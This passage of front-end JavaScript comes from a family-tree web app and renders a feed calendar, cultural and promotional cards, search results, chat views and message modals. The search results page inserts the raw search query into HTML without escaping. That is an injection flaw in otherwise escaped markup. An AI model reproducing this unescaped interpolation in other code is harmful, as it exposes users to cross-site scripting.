                { text: "Where you will sit when you are old shows where you stood in youth.", origin: "Yoruba Proverb" },
            ],
            funFacts: [
                { title: "African Languages", text: "Africa is home to over 2,000 languages, making it the most linguistically diverse continent.", icon: "🗣️" },
                { title: "Ancient Civilizations", text: "The Kingdom of Kush in Nubia had more pyramids than Egypt, with over 200 pyramids discovered.", icon: "🏛️" },
                { title: "Musical Heritage", text: "African rhythms and instruments influenced music worldwide, from jazz and blues to salsa and reggae.", icon: "🎵" },
                { title: "African Cuisine", text: "Jollof rice, a beloved West African dish, has sparked friendly rivalries between countries over who makes it best!", icon: "🍚" },
                { title: "Wildlife Diversity", text: "Africa is home to the 'Big Five': lion, leopard, rhinoceros, elephant, and Cape buffalo.", icon: "🦁" },
                { title: "Ancient Scripts", text: "The ancient Ge'ez script of Ethiopia is still used today and dates back over 2,000 years.", icon: "📜" },
                { title: "Trade Networks", text: "The ancient trans-Saharan trade routes connected Africa to the Mediterranean and Middle East for thousands of years.", icon: "🐪" },
                { title: "Storytelling Tradition", text: "Griots are West African storytellers who preserve history through oral tradition, passing down family histories for generations.", icon: "📖" },
            ],
            familyWisdom: [
                { text: "The strength of a family lies in the stories we share and the bonds we nurture.", icon: "👨‍👩‍👧‍👦" },
                { text: "Every elder is a library. When they pass, we lose volumes of wisdom.", icon: "📚" },
                { text: "Family ties are like the branches of a tree - they may grow in different directions, yet the roots remain as one.", icon: "🌳" },
                { text: "Preserve your family's story, for in knowing where we come from, we understand who we are.", icon: "📸" },
                { text: "The legacy we leave is not in our possessions, but in the memories we create together.", icon: "💝" },
                { text: "A family's history is its greatest treasure, more valuable than gold.", icon: "👑" },
            ]
        };

        // Session 2c: in-Feed Calendar card. Shows upcoming family birthdays +
        // memorial anniversaries computed client-side from appState.personsInTree
        // (loaded on FTV render). Card is inserted between the doodle (position 0)
        // and the first real post. Tap → calendar-view for the full picture.
        //
        // Empty container renders with a placeholder skeleton; _populateFeedCalendarCard
        // fills it once personsInTree is available. If persons never loads (fresh
        // account with no tree yet), the card stays as a quiet "See family calendar →"
        // link so users know the surface exists.
        function renderFeedCalendarCard() {
            return `
                <div id="feed-calendar-card" class="p-4 sm:p-5 mb-3 sm:mb-4 rounded-xl shadow-sm bg-white border border-gray-200 cursor-pointer active:bg-gray-50" onclick="navigateToView('calendar-view')">
                    <div class="flex items-start justify-between gap-3">
                        <div class="flex-1 min-w-0">
                            <div class="flex items-center gap-2 text-sm font-semibold text-gray-700 mb-1">
                                ${tablerIcon('calendar', { size: 18, preserveColor: true, className: 'text-primary' })}
                                <span>Family Calendar</span>
                            </div>
                            <div id="feed-calendar-card-body" class="text-sm text-gray-600">
                                <span class="text-gray-400">Loading upcoming events…</span>
                            </div>
                        </div>
                        <div class="text-primary text-xs font-medium flex-shrink-0 mt-1">
                            View →
                        </div>
                    </div>
                </div>
            `;
        }

        // Compute upcoming family events (birthdays for living Persons +
        // memorial anniversaries for deceased) in the next 30 days. Returns
        // sorted array of {daysUntil, label, personName, kind: 'birthday'|'memorial'}.
        function _computeUpcomingFamilyEvents(days = 30) {
            const persons = appState.personsInTree || [];
            if (!persons.length) return [];
            const now = new Date();
            const today = new Date(now.getFullYear(), now.getMonth(), now.getDate());
            const events = [];

            for (const p of persons) {
                if (!p.birth_month || !p.birth_day) continue;
                const name = `${p.first_name || ''} ${p.last_name || ''}`.trim() || 'A family member';
                // Living → birthday. Deceased → memorial (use death_month/day if present, else birth).
                const isAlive = p.isAlive !== false && p.is_alive !== false;
                const kind = isAlive ? 'birthday' : 'memorial';
                const month = (kind === 'memorial' && p.death_month) ? p.death_month : p.birth_month;
                const day = (kind === 'memorial' && p.death_day) ? p.death_day : p.birth_day;

                // Compute next occurrence of month/day. Try this year first; if
                // already passed, roll to next year.
                let candidate = new Date(now.getFullYear(), month - 1, day);
                if (candidate < today) {
                    candidate = new Date(now.getFullYear() + 1, month - 1, day);
                }
                const daysUntil = Math.round((candidate - today) / (24 * 60 * 60 * 1000));
                if (daysUntil > days) continue;

                events.push({
                    daysUntil,
                    personName: name,
                    kind,
                    monthDay: candidate,
                });
            }
            events.sort((a, b) => a.daysUntil - b.daysUntil);
            return events;
        }

        // Fill the Feed Calendar card body. Called after fetchAndRenderFeed
        // renders the initial skeleton, then again after personsInTree loads
        // (via loadFamilyTreeData completion in the feed-view render path).
        function _populateFeedCalendarCard() {
            const body = document.getElementById('feed-calendar-card-body');
            if (!body) return;

            const persons = appState.personsInTree || [];
            if (!persons.length) {
                body.innerHTML = '<span class="text-gray-500">See upcoming birthdays and family dates.</span>';
                return;
            }

            const upcoming = _computeUpcomingFamilyEvents(30);
            if (!upcoming.length) {
                body.innerHTML = '<span class="text-gray-500">No family events in the next 30 days.</span>';
                return;
            }

            const formatWhen = (daysUntil) => {
                if (daysUntil === 0) return 'Today';
                if (daysUntil === 1) return 'Tomorrow';
                if (daysUntil <= 7) return `In ${daysUntil} days`;
                return `In ${daysUntil} days`;
            };
            const formatItem = (e) => {
                const icon = e.kind === 'birthday' ? '🎂' : '🕯️';
                const noun = e.kind === 'birthday' ? "'s birthday" : ' remembered';
                return `<div class="flex items-center gap-2"><span>${icon}</span><span class="truncate">${escapeHtml(e.personName)}${noun}</span><span class="text-xs text-gray-400 flex-shrink-0 ml-auto">${formatWhen(e.daysUntil)}</span></div>`;
            };

            const summary = upcoming.length > 1
                ? `<div class="text-xs text-gray-500 mb-2">${upcoming.length} upcoming in the next 30 days</div>`
                : '';
            const list = upcoming.slice(0, 3).map(formatItem).join('');
            body.innerHTML = summary + `<div class="space-y-1">${list}</div>`;
        }

        function renderAfricanCultureCard(position) {
            // Randomly select a content type. Two audiences:
            //   - Ebiwawa Family (User 0): unchanged 3-type pool. The
            //     dedicated ad banner slot at the top of the feed carries
            //     the demo ads for investor preview.
            //   - Everyone else: 5-type pool with H1 (Invite) and H2
            //     (Photo Analysis) folded in as members of this rotation
            //     (per ad-banner-brief.md revised: "one-slot rule" — the
            //     headline slot shows either a cultural card or a house
            //     ad per render, never both). Regular users have NO
            //     dedicated ad banner elsewhere.
            // Same Math.random() selection mechanism the cultural cards
            // already used — no new rotation infra.
            const isDemo = appState.currentUserNeo4jId === 0;
            const types = isDemo
                ? ['proverb', 'funFact', 'familyWisdom']
                : ['proverb', 'funFact', 'familyWisdom', 'houseInvite', 'housePhoto'];
            const selectedType = types[Math.floor(Math.random() * types.length)];

            let content = '';
            let bgGradient = '';
            let title = '';
            let icon = '';

            if (selectedType === 'proverb') {
                const proverb = africanCulturalContent.proverbs[Math.floor(Math.random() * africanCulturalContent.proverbs.length)];
                title = 'African Wisdom';
                icon = '🌍';
                bgGradient = 'from-amber-50 to-orange-50';
                content = `
                    <div class="relative">
                        <div class="text-4xl sm:text-5xl text-amber-500 opacity-30 absolute -top-2 -left-1">"</div>
                        <p class="text-sm sm:text-base italic text-gray-800 pl-6 pr-4 py-2">${proverb.text}</p>
                        <p class="text-xs sm:text-sm text-right text-amber-700 font-medium mt-2">— ${proverb.origin}</p>
                    </div>
                `;
            } else if (selectedType === 'funFact') {
                const fact = africanCulturalContent.funFacts[Math.floor(Math.random() * africanCulturalContent.funFacts.length)];
                title = 'Did You Know?';
                icon = fact.icon;
                bgGradient = 'from-emerald-50 to-teal-50';
                content = `
                    <div>
                        <h4 class="text-sm sm:text-base font-bold text-emerald-800 mb-2">${fact.title}</h4>
                        <p class="text-xs sm:text-sm text-gray-700">${fact.text}</p>
                    </div>
                `;
            } else if (selectedType === 'familyWisdom') {
                const wisdom = africanCulturalContent.familyWisdom[Math.floor(Math.random() * africanCulturalContent.familyWisdom.length)];
                title = 'Family Wisdom';
                icon = wisdom.icon;
                bgGradient = 'from-purple-50 to-pink-50';
                content = `
                    <p class="text-sm sm:text-base text-gray-800 italic text-center">${wisdom.text}</p>
                `;
            } else if (selectedType === 'houseInvite') {
                // H1 — Invite. CTA opens the existing invite modal.
                title = 'The tree grows when family joins';
                icon = '🌱';
                bgGradient = 'from-orange-50 to-amber-50';
                content = `
                    <p class="text-sm sm:text-base text-gray-700 mb-4">Invite a sibling, a cousin, an elder — each person adds branches only they remember.</p>
                    <button type="button" onclick="openModal('invite-family-modal')" class="ebw-btn ebw-btn-primary">Send an invite</button>
                `;
            } else {
                // H2 — Photo Analysis. CTA triggers the existing quick
                // photo upload flow (which is the entry point into
                // Photos view + the Photo Analysis AI feature).
                title = 'What year was this taken?';
                icon = '📷';
                bgGradient = 'from-blue-50 to-sky-50';
                content = `
                    <p class="text-sm sm:text-base text-gray-700 mb-4">Upload an old family photo and let Ebiwawa estimate the era. Then ask your elders if it got it right.</p>
                    <button type="button" onclick="handleQuickUploadClick()" class="ebw-btn ebw-btn-primary">Try it on a photo</button>
                `;
            }

            return `
                <div class="p-4 sm:p-6 mb-3 sm:mb-4 rounded-xl shadow-md bg-gradient-to-br ${bgGradient} border border-opacity-20 border-gray-300" data-culture-card="${position}">
                    <div class="flex items-center gap-2 mb-3">
                        <span class="text-2xl">${icon}</span>
                        <h3 class="text-base sm:text-lg font-bold text-gray-800">${title}</h3>
                    </div>
                    <div class="mb-3">
                        ${content}
                    </div>
                    <!-- African-inspired pattern decoration -->
                    <div class="flex justify-center gap-1 opacity-20 mt-4">
                        <span class="text-xs">◆</span>
                        <span class="text-xs">●</span>
                        <span class="text-xs">◆</span>
                        <span class="text-xs">●</span>
                        <span class="text-xs">◆</span>
                    </div>
                </div>
            `;
        }

        function SearchResultsPage(query, results) {
            if (!results) {
                return `
                    <div id="search-results-view" data-view>
                        <div class="max-w-4xl mx-auto">
                            <h2 class="text-2xl font-semibold mb-6">Search Results</h2>
                            <div class="bg-yellow-50 border border-yellow-200 rounded-lg p-4">
                                <p class="text-yellow-800">Loading search results...</p>
                            </div>
                        </div>
                    </div>
                `;
            }

            const totalResults = results.totalResults || 0;

            if (totalResults === 0) {
                return `
                    <div id="search-results-view" data-view>
                        <div class="max-w-4xl mx-auto">
                            <h2 class="text-2xl font-semibold mb-2">Search Results</h2>
                            <p class="text-gray-500 mb-6">for "${query}"</p>
                            <div class="bg-gray-50 border border-gray-200 rounded-lg p-8 text-center">
                                <p class="text-gray-600 text-lg">No results found for "${query}"</p>
                                <p class="text-gray-500 text-sm mt-2">Try different keywords or check your spelling</p>
                            </div>
                        </div>
                    </div>
                `;
            }

            return `
                <div id="search-results-view" data-view>
                    <div class="max-w-4xl mx-auto">
                        <h2 class="text-2xl font-semibold mb-2">Search Results</h2>
                        <p class="text-gray-500 mb-6">${totalResults} result${totalResults !== 1 ? 's' : ''} for "${query}"</p>

                        <!-- People Results -->
                        ${results.results.people.count > 0 ? `
                            <div class="mb-8">
                                <h3 class="text-lg font-semibold mb-3 text-gray-700 inline-flex items-center gap-2">
                                    ${tablerIcon('users', { size: 16 })} People (${results.results.people.count})
                                </h3>
                                <div class="space-y-2">
                                    ${results.results.people.items.map(person => `
                                        <div class="bg-white p-4 rounded-lg shadow-sm hover:shadow-md transition-shadow cursor-pointer border border-gray-200"
                                             onclick="navigateToView('person-detail-view', {person: ${JSON.stringify(person).replace(/"/g, '&quot;')}})">
                                            <div class="flex items-center">
                                                <div class="w-10 h-10 rounded-full bg-gray-200 flex items-center justify-center mr-3">
                                                    ${tablerIcon('user-circle', { size: 20 })}
                                                </div>
                                                <div>
                                                    <p class="font-semibold">${escapeHtml(person.first_name)} ${escapeHtml(person.last_name)}</p>
                                                    ${person.birth_year ? `<p class="text-sm text-gray-500">Born ${person.birth_year}</p>` : ''}
                                                </div>
                                            </div>
                                        </div>
                                    `).join('')}
                                </div>
                            </div>
                        ` : ''}

                        <!-- Posts Results -->
                        ${results.results.posts.count > 0 ? `
                            <div class="mb-8">
                                <h3 class="text-lg font-semibold mb-3 text-gray-700 inline-flex items-center gap-2">
                                    ${tablerIcon('notes', { size: 16 })} Posts (${results.results.posts.count})
                                </h3>
                                <div class="space-y-2">
                                    ${results.results.posts.items.map(post => `
                                        <div class="bg-white p-4 rounded-lg shadow-sm hover:shadow-md transition-shadow cursor-pointer border border-gray-200"
                                             onclick="navigateToView('feed-view')">
                                            <p class="font-semibold">${escapeHtml(post.title || 'Untitled Post')}</p>
                                            ${post.content ? `<p class="text-sm text-gray-600 mt-1 line-clamp-2">${escapeHtml(post.content.substring(0, 150))}${post.content.length > 150 ? '...' : ''}</p>` : ''}
                                            ${post.author ? `<p class="text-xs text-gray-500 mt-2">By ${escapeHtml(post.author.name || post.author.email)}</p>` : ''}
                                        </div>
                                    `).join('')}
                                </div>
                            </div>
                        ` : ''}

                        <!-- Events Results -->
                        ${results.results.events.count > 0 ? `
                            <div class="mb-8">
                                <h3 class="text-lg font-semibold mb-3 text-gray-700 inline-flex items-center gap-2">
                                    ${tablerIcon('calendar', { size: 16 })} Events (${results.results.events.count})
                                </h3>
                                <div class="space-y-2">
                                    ${results.results.events.items.map(event => `
                                        <div class="bg-white p-4 rounded-lg shadow-sm hover:shadow-md transition-shadow cursor-pointer border border-gray-200"
                                             onclick="navigateToView('calendar-view')">
                                            <p class="font-semibold">${escapeHtml(event.name || 'Untitled Event')}</p>
                                            ${event.description ? `<p class="text-sm text-gray-600 mt-1">${escapeHtml(event.description)}</p>` : ''}
                                            ${event.date ? `<p class="text-xs text-gray-500 mt-2 inline-flex items-center gap-1">${tablerIcon('calendar', { size: 14 })} ${event.date}</p>` : ''}
                                        </div>
                                    `).join('')}
                                </div>
                            </div>
                        ` : ''}

                        <!-- Albums Results -->
                        ${results.results.albums.count > 0 ? `
                            <div class="mb-8">
                                <h3 class="text-lg font-semibold mb-3 text-gray-700 inline-flex items-center gap-2">
                                    ${tablerIcon('photo', { size: 16 })} Albums (${results.results.albums.count})
                                </h3>
                                <div class="space-y-2">
                                    ${results.results.albums.items.map(album => `
                                        <div class="bg-white p-4 rounded-lg shadow-sm hover:shadow-md transition-shadow cursor-pointer border border-gray-200"
                                             data-album-id="${album.id}"
                                             data-album-title="${escapeHtml(album.name || '')}"
                                             data-album-description="${escapeHtml(album.description || '')}"
                                             data-album-is-default="${album.isDefault ? 'true' : 'false'}"
                                             onclick="openAlbumFromEl(this)">
                                            <p class="font-semibold">${escapeHtml(album.name || 'Untitled Album')}</p>
                                            ${album.description ? `<p class="text-sm text-gray-600 mt-1">${escapeHtml(album.description)}</p>` : ''}
                                        </div>
                                    `).join('')}
                                </div>
                            </div>
                        ` : ''}

                        <!-- Photos Results -->
                        ${results.results.photos.count > 0 ? `
                            <div class="mb-8">
                                <h3 class="text-lg font-semibold mb-3 text-gray-700 inline-flex items-center gap-2">
                                    ${tablerIcon('photo', { size: 16 })} Photos (${results.results.photos.count})
                                </h3>
                                <div class="grid grid-cols-2 md:grid-cols-3 lg:grid-cols-4 gap-4">
                                    ${results.results.photos.items.map(photo => `
                                        <div class="bg-white p-2 rounded-lg shadow-sm hover:shadow-md transition-shadow cursor-pointer border border-gray-200">
                                            <div class="aspect-square bg-gray-100 rounded flex items-center justify-center">
                                                ${tablerIcon('photo', { size: 24 })}
                                            </div>
                                            ${photo.caption ? `<p class="text-xs text-gray-600 mt-2 truncate">${escapeHtml(photo.caption)}</p>` : ''}
                                        </div>
                                    `).join('')}
                                </div>
                            </div>
                        ` : ''}
                    </div>
                </div>
            `;
        }

        function FeedPage() {
            return `
                <div id="feed-view" data-view>
                    <div class="max-w-2xl mx-auto">
                        <!-- Session 2c.2: "Share a Story" button removed. Add
                             tab action sheet (2c.1 #5) owns text-post creation.
                             The empty-state CTA in ebwEmptyState still surfaces
                             when the feed is empty — that's onboarding nudge,
                             not a persistent second path. -->

                        ${nativeFeedSegmentedControl('posts')}

                        <!-- Top Banner Ad -->
                        ${renderBannerAd('top')}

                        <!-- On This Day Birthdays -->
                        <div id="birthdays-container" class="mb-6"></div>

                        <!-- Feed Posts -->
                        <div id="feed-container" class="space-y-4">
                            <p class="text-center text-gray-500">Loading feed...</p>
                        </div>
                    </div>
                </div>
            `;
        }

        function ChatPage() {
            // Master-detail pattern on mobile (< md): only one pane visible
            // at a time, driven by data-chat-pane on the wrapper. Selecting
            // a conversation switches to 'thread'; back button switches
            // back to 'list'. On desktop (md+), both panes render side-by-
            // side regardless of the attribute (CSS overrides).
            //
            // Bottom padding on mobile leaves 4rem (64px) for the mobile
            // bottom nav so the message input stays reachable above it.
            const pane = _chatMobilePane || 'list';
            return `
                <div id="chat-view" data-view data-chat-pane="${pane}" class="flex chat-mobile-wrapper">
                    <div class="chat-pane-list w-full lg:w-1/3 lg:border-r bg-surface flex-col">
                        <div class="p-4 border-b flex items-center justify-between">
                            <h2 class="text-xl font-semibold">Conversations</h2>
                            <button onclick="openNewMessageModal()" class="px-3 py-1 text-sm font-semibold text-white rounded-md bg-primary hover:bg-opacity-90">New Message</button>
                        </div>
                        <div id="conversation-list" class="flex-1 overflow-y-auto"></div>
                    </div>
                    <div id="message-view" class="chat-pane-thread w-full lg:w-2/3 flex-col bg-gray-50">
                        <div class="flex items-center justify-center h-full"><p class="text-text-secondary">Select a conversation.</p></div>
                    </div>
                </div>
            `;
        }

        function NewMessageModal() {
            // Get all connected users (members) for the chat selector
            // Use members from tree instead of persons, since we need actual users to chat with
            const memberOptions = (appState.treeMembers || [])
                .filter(m => m.user.id !== appState.currentUserNeo4jId) // Don't show current user
                .map(m => `<option value="${m.user.id}">${escapeHtml(m.user.name || m.user.email)}</option>`)
                .join('');

            const memberCheckboxes = (appState.treeMembers || [])
                .filter(m => m.user.id !== appState.currentUserNeo4jId)
                .map(m => `
                    <label class="flex items-center gap-2 p-2 hover:bg-gray-50 rounded cursor-pointer">
                        <input type="checkbox" name="group-participants" value="${m.user.id}" class="w-4 h-4 text-primary border-gray-300 rounded focus:ring-2 focus:ring-primary">
                        <span class="text-sm">${escapeHtml(m.user.name || m.user.email)}</span>
                    </label>
                `).join('');

            return `
                <div id="new-message-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto">
                    <div class="w-full max-w-md mx-auto mt-4 md:my-8 rounded-lg shadow-xl bg-surface transform translate-y-10 transition-transform duration-300 overflow-y-auto relative" style="max-height: calc(var(--vh, 100vh) - 2rem);">
                        <!-- Sticky header with title + close X. Stays pinned at the top of the modal card as the user scrolls through a long recipient list, so cancelling is always one tap away. -->
                        <div class="sticky top-0 z-10 flex items-center justify-between px-4 md:px-8 py-4 bg-surface border-b border-gray-200 rounded-t-lg">
                            <h2 class="text-2xl font-bold">New Message</h2>
                            <button type="button" onclick="closeModal('new-message-modal')"
                                class="p-2 -mr-2 text-gray-500 hover:text-gray-700 hover:bg-gray-100 rounded-lg transition-colors"
                                aria-label="Close">
                                ${tablerIcon('x', { size: 20, preserveColor: true })}
                            </button>
                        </div>
                        <div class="p-4 md:p-8 pt-4 md:pt-6 space-y-4 md:space-y-6">

                        <!-- Chat Type Toggle -->
                        <div class="flex gap-2 border border-gray-200 rounded-lg p-1">
                            <button type="button" id="direct-chat-btn" onclick="toggleChatType('direct')"
                                    class="flex-1 px-4 py-2 text-sm font-medium rounded-md transition-colors bg-primary text-white">
                                Direct Message
                            </button>
                            <button type="button" id="group-chat-btn" onclick="toggleChatType('group')"
                                    class="flex-1 px-4 py-2 text-sm font-medium rounded-md transition-colors text-gray-600 hover:bg-gray-100">
                                Group Chat
                            </button>
                        </div>

                        <form id="new-message-form" class="space-y-4">
                            <!-- Direct Message Fields -->
                            <div id="direct-message-fields">
                                <div>
                                    <label for="message-recipient-btn" class="block text-sm font-medium text-gray-700">Send to</label>
                                    <!-- Custom picker button replaces the native <select> so we can guarantee a visible Cancel/close in the recipient picker (iOS picker offers Done but no Cancel). -->
                                    <button type="button" id="message-recipient-btn" onclick="openRecipientPicker()"
                                        class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md text-left flex items-center justify-between hover:bg-gray-50 focus:outline-none focus:ring-2 focus:ring-primary">
                                        <span id="message-recipient-label" class="text-gray-500 truncate">-- Select a family member --</span>
                                        ${tablerIcon('chevron-down', { size: 16, preserveColor: true })}
                                    </button>
                                    <!-- Hidden native select retained so form submission reads message-recipient.value unchanged. Kept in sync when the picker selects a member. -->
                                    <select id="message-recipient" class="hidden">
                                        <option value="">-- Select a family member --</option>
                                        ${memberOptions}
                                    </select>
                                </div>
                            </div>

                            <!-- Recipient picker moved out to a sibling of NewMessageModal (see RecipientPickerModal). The transform class on the modal card creates a containing block that traps fixed-positioned children, breaking overlay placement especially in landscape. Rendering at modal-container level keeps fixed positioning truly viewport-relative. -->

                            <!-- Group Chat Fields -->
                            <div id="group-chat-fields" class="hidden">
                                <div class="mb-4">
                                    <label for="group-name" class="block text-sm font-medium text-gray-700 mb-1">Group Name (optional)</label>
                                    <input type="text" id="group-name" placeholder="e.g., Family Planning"
                                           class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                </div>
                                <div>
                                    <label class="block text-sm font-medium text-gray-700 mb-2">Select Participants (at least 2)</label>
                                    <div class="max-h-48 overflow-y-auto border border-gray-300 rounded-md p-2 space-y-1">
                                        ${memberCheckboxes}
                                    </div>
                                </div>
                            </div>

                            <div>
                                <label for="first-message" class="block text-sm font-medium text-gray-700">First Message</label>
                                <textarea id="first-message" required rows="3" placeholder="Type your message..." class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary"></textarea>
                            </div>
                            <div id="new-message-error" class="text-sm text-red-600 text-center"></div>
                            <div class="flex justify-end pt-4 space-x-4">
                                <button type="button" onclick="closeModal('new-message-modal')" class="px-4 py-2 font-semibold text-gray-700 bg-gray-200 rounded-md hover:bg-gray-300">Cancel</button>
                                <button type="submit" class="btn btn-primary">Send</button>
                            </div>
                        </form>
                        </div>
                    </div>
                </div>
            `;
        }

        // Standalone recipient picker — rendered at modal-container level so
        // `fixed inset-0` is truly viewport-relative (not trapped by the
        // NewMessageModal's transform-created containing block, which caused
        // landscape misplacement + empty-list rendering).
        function RecipientPickerModal() {
            // Two independently-positioned fixed layers avoid every vh /
            // dvh / flex-1 iOS Safari quirk:
            //   1. Backdrop: fixed inset-0 (full viewport, dark, opaque)
            //   2. Card: fixed inset-4 md:inset-16 (16px / 64px from each
            //      viewport edge) — a concrete rectangle the browser
            //      always sizes correctly without CSS unit math
            // The card gets an explicit height from browser layout of its
            // own bounds, so flex-1 on the inner list works reliably.
            return `
                <div id="recipient-picker" class="hidden">
                    <div class="fixed inset-0 z-[59] bg-black bg-opacity-50"></div>
                    <div class="fixed inset-4 md:inset-16 z-[60] max-w-md mx-auto bg-surface rounded-lg shadow-xl flex flex-col overflow-hidden">
                        <div class="flex items-center justify-between px-4 py-3 border-b bg-surface flex-shrink-0">
                            <h3 class="font-semibold text-lg">Select a family member</h3>
                            <button type="button" onclick="closeRecipientPicker()"
                                class="p-2 -mr-2 text-gray-500 hover:text-gray-700 hover:bg-gray-100 rounded-lg"
                                aria-label="Cancel">
                                ${tablerIcon('x', { size: 20, preserveColor: true })}
                            </button>
                        </div>
                        <div id="recipient-picker-list" class="overflow-y-auto flex-1 min-h-0" style="-webkit-overflow-scrolling: touch; overscroll-behavior: contain;"></div>
                        <div class="px-4 py-3 border-t bg-surface flex-shrink-0">
                            <button type="button" onclick="closeRecipientPicker()"
                                class="w-full px-4 py-2 font-semibold text-gray-700 bg-gray-100 rounded-md hover:bg-gray-200">
                                Cancel
                            </button>
                        </div>
                    </div>
                </div>
            `;
        }

        function MessageView(conversation) {
            let displayName, initials, subtitle = '';

            if (conversation.type === 'group') {
                // Group chat: show group name and participant count
                if (conversation.name) {
                    displayName = conversation.name;
                    initials = conversation.name.split(' ').map(n => n[0]).join('').substring(0, 2).toUpperCase();
                } else {
                    const participantNames = conversation.participants_info
                        ? conversation.participants_info.map(p => p.name || p.email).join(', ')
                        : 'Group Chat';
                    displayName = participantNames;
                    initials = '👥';
                }
                // Show participant count (participants array already includes current user)
                const participantCount = conversation.participants?.length || conversation.participants_info?.length || 0;
                subtitle = `${participantCount} participants`;
            } else {
                // Direct message: show the other participant
                const participant = conversation.participants_info && conversation.participants_info[0];
                displayName = participant ? (participant.name || participant.email || 'Unknown User') : 'Unknown User';
                initials = participant && participant.name ? participant.name.split(' ').map(n => n[0]).join('').substring(0, 2).toUpperCase() : '?';
            }

            return `
                <!-- Header -->
                <div class="p-4 border-b bg-surface flex items-center justify-between">
                    <div class="flex items-center gap-3 min-w-0">
                        <!-- Mobile back button — returns to conversation list. Hidden on lg+ where both panes render side-by-side. -->
                        <button type="button" onclick="backToConversationList()"
                            class="lg:hidden p-2 -ml-2 text-gray-600 hover:bg-gray-100 rounded-lg transition-colors flex-shrink-0"
                            aria-label="Back to conversations">
                            ${tablerIcon('chevron-left', { size: 24, preserveColor: true })}
                        </button>
                        <div class="w-10 h-10 rounded-full bg-gradient-to-br from-primary to-purple-600 flex items-center justify-center text-white font-semibold flex-shrink-0">
                            ${escapeHtml(initials)}
                        </div>
                        <div class="min-w-0">
                            <h3 class="font-semibold text-lg truncate">${escapeHtml(displayName)}</h3>
                            ${subtitle ? `<p class="text-xs text-gray-500 truncate">${escapeHtml(subtitle)}</p>` : ''}
                        </div>
                    </div>
                    <div class="flex items-center gap-2">
                        <button data-conv-id="${escapeHtml(conversation.id)}" onclick="archiveConversation(this.dataset.convId)"
                            class="p-2 text-gray-600 hover:bg-gray-100 rounded-lg transition-colors"
                            title="Archive conversation">
                            ${tablerIcon('archive', { size: 20, preserveColor: true })}
                        </button>
                        <button data-conv-id="${escapeHtml(conversation.id)}" onclick="deleteConversation(this.dataset.convId)"
                            class="p-2 text-red-600 hover:bg-red-50 rounded-lg transition-colors"
                            title="Delete conversation">
                            ${tablerIcon('trash', { size: 20, preserveColor: true })}
                        </button>
                    </div>
                </div>

                <!-- Messages -->
                <div id="message-list" class="flex-1 p-4 overflow-y-auto bg-gray-50"></div>

                <!-- Input. safe-area-bottom pads past iOS home indicator
                     / Android gesture bar when the chat thread is the
                     bottom-most surface on mobile (chat-mobile-wrapper's
                     height already reserves for the bottom nav on non-lg
                     views, but on the thread pane the composer needs
                     safe-area clearance directly). -->
                <div class="p-4 bg-surface border-t safe-area-bottom">
                    <form id="message-form" class="flex items-end gap-2">
                        <input type="file" id="message-file-input" class="hidden" accept="image/*,application/pdf,.doc,.docx,.txt">
                        <button type="button" onclick="document.getElementById('message-file-input').click()"
                            class="p-2 text-gray-600 hover:bg-gray-100 rounded-lg transition-colors flex-shrink-0"
                            title="Attach file">
                            ${tablerIcon('paperclip', { size: 24, preserveColor: true })}
                        </button>
                        <div class="flex-1">
                            <div id="file-preview" class="mb-2 hidden">
                                <div class="inline-flex items-center gap-2 px-3 py-2 bg-gray-100 rounded-lg text-sm">
                                    <span id="file-name"></span>
                                    <button type="button" onclick="clearFileSelection()" class="text-gray-500 hover:text-gray-700">
                                        ${tablerIcon('x', { size: 16, preserveColor: true })}
                                    </button>
                                </div>
                            </div>
                            <input id="message-input" type="text" placeholder="Type a message..."
                                class="w-full px-4 py-2 border border-gray-300 rounded-lg focus:outline-none focus:ring-2 focus:ring-primary"
                                autocomplete="off">
                        </div>
                        <button type="submit"
                            class="px-6 py-2 font-semibold text-white rounded-lg bg-primary hover:bg-opacity-90 transition-colors flex-shrink-0">
                            Send
                        </button>
                    </form>
                </div>
            `;
        }
        function CalendarPage() {
            return `
                <div id="calendar-view" data-view>
                    <!-- Header -->
                    <div class="flex items-center justify-between mb-6">
                        <h2 class="text-2xl font-semibold">My Calendars</h2>
                        ${FEATURES.calendarEventCreation ? `
                        <button onclick="openModal('create-event-modal')" class="btn btn-primary">
                            + Create Event
                        </button>
                        ` : ''}
                    </div>

                    <div class="grid grid-cols-1 lg:grid-cols-4 gap-6">
                        <!-- Left Sidebar -->
                        <div class="lg:col-span-1 space-y-4">
                            <!-- Calendar List -->
                            <div class="bg-surface p-4 rounded-lg shadow-sm">
                                <h3 class="font-semibold mb-3">My Calendars</h3>
                                <div id="calendar-list" class="space-y-2">
                                    <p class="text-sm text-gray-500">Loading calendars...</p>
                                </div>
                            </div>

                            <!-- Upcoming Events Widget -->
                            <div class="bg-surface p-4 rounded-lg shadow-sm">
                                <h3 class="font-semibold mb-3">Upcoming Events</h3>
                                <div id="upcoming-events" class="space-y-2">
                                    <p class="text-sm text-gray-500">Loading...</p>
                                </div>
                            </div>
                        </div>

                        <!-- Main Calendar Area -->
                        <div class="lg:col-span-3">
                            <div class="bg-surface p-4 rounded-lg shadow-sm">
                                <!-- View Toggle & Month Navigation -->
                                <div class="flex flex-col sm:flex-row items-center justify-between mb-4 gap-4">
                                    <!-- Month Navigation -->
                                    <div class="flex items-center gap-3">
                                        <button onclick="changeMonth(-1)" class="p-2 hover:bg-gray-100 rounded-lg transition-colors">
                                            ←
                                        </button>
                                        <h3 id="current-month-year" class="text-lg font-semibold min-w-[180px] text-center">
                                            Loading...
                                        </h3>
                                        <button onclick="changeMonth(1)" class="p-2 hover:bg-gray-100 rounded-lg transition-colors">
                                            →
                                        </button>
                                        <button onclick="goToToday()" class="px-3 py-1 text-sm bg-gray-100 hover:bg-gray-200 rounded-md transition-colors">
                                            Today
                                        </button>
                                    </div>

                                    <!-- View Mode Toggle -->
                                    <div class="flex gap-2 border border-gray-200 rounded-lg p-1">
                                        <button id="month-view-btn" onclick="switchCalendarView('month')"
                                                class="px-4 py-2 text-sm font-medium rounded-md transition-colors bg-primary text-white">
                                            Month
                                        </button>
                                        <button id="agenda-view-btn" onclick="switchCalendarView('agenda')"
                                                class="px-4 py-2 text-sm font-medium rounded-md transition-colors text-gray-600 hover:bg-gray-100">
                                            Agenda
                                        </button>
                                    </div>
                                </div>

                                <!-- Month View -->
                                <div id="month-view-container">
